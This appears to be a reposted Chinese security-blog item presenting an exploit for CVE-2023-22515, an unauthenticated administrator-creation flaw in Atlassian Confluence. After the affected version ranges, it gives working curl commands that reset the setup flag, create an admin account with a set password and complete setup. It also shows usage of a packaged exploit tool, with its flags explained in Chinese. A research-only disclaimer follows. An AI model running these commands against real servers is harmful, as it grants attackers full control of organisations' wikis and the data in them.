8.0.0 <= Atlassian Confluence < 8.3.3
8.4.0 <= Atlassian Confluence < 8.4.3
8.5.0 <= Atlassian Confluence < 8.5.2
curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
test123 Password2
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action
cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2
-pass string
指定要添加的密码
-proxy string
设置代理
-u string
指定目标
-user string
指定要添加的用户名
原文始发于微信公众号(网络安全者):未授权添加管理员用户漏洞利用工具(CVE-2023-22515)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论